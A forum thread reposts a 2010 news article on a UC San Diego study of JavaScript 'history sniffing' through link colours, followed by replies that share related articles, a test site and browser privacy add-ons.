History Sniffing - What Is It?

[ritchie58]

On the heels of a government report pushing a "do not track" option for Web browsers, a recent study from the University of California-San Diego finds that browser vulnerabilities can allow access to your Web-surfing history.

 

Researchers cautioned, however, that the practice is not as harmful as malicious software attacks like malware.

 

JavaScript code used by Web sites and advertisers exploit browser vulnerabilities to track which sites a user has or has not visited, the report said. Researchers have dubbed the practice "history sniffing," and they claim their work is the first empirical analysis of history sniffing across the Web.

 

"Nobody knew if anyone on the Internet was using history sniffing to get at users' private browsing history. What we were able to show is that the answer is yes," UC San Diego computer science professor Hovav Shacham said in a statement.

 

History sniffing is possible because browsers display links to sites you've visited differently from those you have not. If you've clicked on a link, it shows up purple. If you have not clicked, it displays as blue.

 

"History sniffing JavaScript code running on a Web page checks to see if your browser displays links to specific URLs as blue or purple," the report said.

 

Why is this important? Researchers said that Web site owners can use this information to see if you have been visiting the Web sites of their competitors. Advertising companies can also used the data to build user profiles, while criminals could watch which banking sites you use to know which fake banking site they should use for a phishing attack.

 

"JavaScript is a great thing, it allows things like Gmail and Google Maps and a whole bunch of Web 2.0 applications; but it also opens up a lot of security vulnerabilities. We want to let the broad public know that history sniffing is possible, it actually happens out there, and that there are a lot of people vulnerable to this attack," said Sorin Lerner, a computer science professor with the university's Jacobs School of Engineering.

 

The report found that the latest versions of Firefox, Chrome, and Safari block history-sniffing attacks. Internet Explorer, however, does not currently defend against history sniffing. November data from Net Applications found that IE still holds 58.26 percent of the global browser market share.

 

A Microsoft spokeswoman said the company takes "a holistic approach to protecting consumer privacy." That includes browser options like InPrivate Browsing, which lets customers surf without having their activity tracked.

 

"Internet Explorer 8's InPrivate Browsing feature puts people in control of their privacy, giving them the important features and controls to understand what information is being shared when they browse the Web," Microsoft said.

 

To gather their data, researchers used their JavaScript monitoring tool to look at the top 50,000 Web sites, as ranked by Alexa. The practice is not particularly widespread, at least. Of the 50,000 sites, they found that 485 of those sites can monitor a browser's history. Of those 485 sites, 63 of them transferred the browser history to the network; researchers only considered it history sniffing if that data was sent to the network. The topics of these 63 sites were varied, though most focused on entertainment. A complete list is included in the report.

 

To gather their data, researchers tagged – or "painted" – a link that was being tracked, akin to the paint packets banks add to bags of stolen money.

 

"As soon as a JavaScript tries to look at the color of a link, we immediately put 'paint' on that. Some sites collected that information but never sent it over the network, so there was all this 'paint' inside the browser. But in other cases, we observed 'paint' being sent over the network, indicating that history sniffing is going on," Lerner said.

 

Going forward, the researchers said they would use this technique to see if history sniffing is also used by Web 2.0 applications and social-network sites.

 

Shacham said that while history sniffing might be invasive, it is not as great a risk to your privacy as malicious software programs like malware, which can steal banking information or an entire Facebook profile. Still, "history sniffing is unusual in effectively allowing any site you visit to learn about your browsing habits on any other site, regardless if the two sites have any business relationship," he said.

 

He advised users to keep their browsers and Flash plug-ins up-to-date to avoid history sniffing.

 

The report comes several days after the Federal Trade Commission released an online privacy report that recommended "do not track" technology for browsers. Essentially, browser companies should add the ability for consumers to opt-out of having their Web activity tracked, the agency said. The FTC discussed it more at a House hearing last week, where a researcher from Symantec expressed his concern about "do not track" technology. Major browser firms like Microsoft, Google, and Mozilla have said they will review the FTC's proposal. Original post: pcmag.com

 

 

 

[duncan]

http://krebsonsecurity.com/2010/12/what-you-should-know-about-history-sniffing/

[duncan]

http://blogs.technet.com/b/microsoft_on_the_issues/archive/2010/12/07/online-privacy-amp-balance-our-perspective.aspx

 

 

 

 

 

 

to test for this issue:

 

http://startpanic.com/

 

 

 

 

Windows XP - sp3

AMD Sempron 2600+

1.5 gig ram

128mb video card (nvidia)

telstra 3G internet connection

opera 11 (beta)

[ritchie58]

With Firefox's NoScript add-on startpanic.com could NOT read my browser history. Here are some other security add-ons with a brief description I use with Firefox. BetterPrivacy - super cookie (LSO) safeguard, BrowserProtect - browser hijack protection, CookieCuller - extended cookie management, CounterPixel - displays the name of a web site counting pixel service(s), KeyScrambler - key-logger protection, Search Engine Security - protects against Blackhat spam search engine optimization (SEO).

[duncan]

Opera 11 browser can be customised for maximum security and privacy:

 

http://my.opera.com/internetsecurity/blog/2010/12/14/clean-out-your-windows-computer-utilities-to-remove-unwanted-data

 

 

 

 

these tips apply to other browsers to.

 

 

[davemc@mail.com]

Hey guys:

Thanks for the great links!

It's quite an issue (with many gray areas/edges.)

Following are a few more links...

 

The article which I found most eye opening is this one, which points out that some on-line shopping sites will actually offer different prices to various people based on their browser history...and it's getting more prevalent. Am I Seeing... and this one My link

 

Bloomberg has a take that targeted advertising isn't all bad (better than 'dumb ads') Bloombrg BusinessWeek

 

N Y Times has good, concise links to using the tools in your browser N Y Times tech

 

PrivacyChoice has several different tools(some aggressive) and a Tracking Company link to list the company's info who's cookies show up (alot of detail.)

 

TACO/Abine offer a multi-setting blocker for Firefox (I.E. coming) for about $3/month.

 

AND, what probably promises to become the industry standard in voluntary opt-out is DoNotTrack , a program from Stanford which sends a message to every site that requests info saying PLEASE Do Not Track. (also only available for Firefox now..others coming) also has some other links.

 

...hope you find these helpful, or at least interesting....sorry so long a post